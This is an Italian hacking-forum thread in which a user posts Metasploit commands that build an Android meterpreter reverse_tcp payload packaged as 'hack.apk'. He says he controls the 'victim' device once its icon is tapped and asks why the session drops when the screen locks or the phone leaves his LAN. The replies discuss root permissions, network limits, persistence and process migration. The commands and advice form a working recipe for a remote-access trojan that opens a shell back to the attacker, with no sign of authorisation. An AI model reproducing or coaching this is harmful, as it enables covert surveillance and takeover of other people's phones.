Domanda Metasploit & Android

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
W

whitered

Utente Bronze
23 Novembre 2015
13
2
1
32
Salve, sto riscontrando un problema riguardante la configurazione di metasploit/android.

msf > use payload/android/meterpreter/reverse_tcp

msf payload(reverse_tcp) > set lhost 000.000.000.000 (il mio ip :))
lhost => 000.000.000.000
msf payload(reverse_tcp) > set lport 7777
lport => 7777

msf payload(reverse_tcp) > generate -t raw -f hack.apk
[ * ] Writing xxxx bytes to hack.apk... (xxxx corrisponde alla dimensione del testo che non ricordo)

Tutto funziona alla grande, riesco poi successivamente ad entrare dentro il dispositivo e a controllarlo. Ma quando il device viene bloccato (ovvero la schermata di sblocco del cellulare) salta la connessione e non si connette più a meno che non lo sblocco e riclicco l'icona del virus sulla home.
Inoltre vorrei sapere com'è possibile che quando non condivido la stessa rete col dispositivo da penetrare non mi è permesso avviare l'exploit e connettermi col dispositivo.
Spero di essere stato chiaro e spero che qualcuno possa aiutarmi a capire se esiste una soluzione.
Stavo pensando che potrebbe essere un caso di porte ma forse in questo modo si risolve il problema del dispositivo quando è bloccato, ma sicuramente non il secondo problema.
 
Se il dispositivo vittima non ha i permessi di root puoi attaccarlo solo in LAN... Stesso problema per la schermata di sblocco, capita spesso che se si attaccano dispositivi senza permessi di root quando il dispositivo va in "blocco" l'exploit si annulla... Spero di esseriti stato utile ;-)
 
  • Mi piace
Reazioni: whitered
Simone1178 ha detto:
Se il dispositivo vittima non ha i permessi di root puoi attaccarlo solo in LAN... Stesso problema per la schermata di sblocco, capita spesso che se si attaccano dispositivi senza permessi di root quando il dispositivo va in "blocco" l'exploit si annulla... Spero di esseriti stato utile ;-)
Clicca per espandere...
Quindi stai dicendo, che se un dispositivo root non ha i permessi in root, puoi controllarlo solo in locale e non con rete mobile? :blabla:
 
Dipende cosa intendi per rete mobile... Sto dicendo che con quell' exploit non puoi controllare un dispositivo non rootato a meno che non sia (il device vittima) sulla stessa rete dell'attaccante... ;)
 
Simone1178 ha detto:
Dipende cosa intendi per rete mobile... Sto dicendo che con quell' exploit non puoi controllare un dispositivo non rootato a meno che non sia (il device vittima) sulla stessa rete dell'attaccante... ;)
Clicca per espandere...
Rete mobile, ovvero il 3g.
...Esatto quello che ho detto io, quindi in locale... ma ne sei sicuro di questo?
Scusa la mia perplessità ho avuto problemi, ho postato anche una domanda sempre qui e non ho trovato soluzione, quindi il problema potrebbe essere questo
 
È semplice..android appena l'applicazione passa in secondo piano chiude la connessione.
L'exploit in teoria ti serve per controllarlo momentaneamente e per riuscire a settare una qualche 'persistence' far migrare il processo...creare più thread ecc..
Non penso centri niente il fatto che il device abbia o meno i permessi root poichè l'applicazione non necessita di tali permessi.
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

N
Discussione #SalviamoPyinstaller - Tutorial per insegnare agli script kiddies come compilare i malware senza "sporcare" Pyinstaller
  • Chiuso
  • 1
  • 285
1
285
Sicurezza Informatica
JunkCoder
N
Discussione Gli EXITFUNC, cosa sono, cosa fanno, come vanno usati in Metasploit
  • 0
  • 377
0
377
Pentesting e Ethical Hacking
Netcat
Top Bottom
Indietro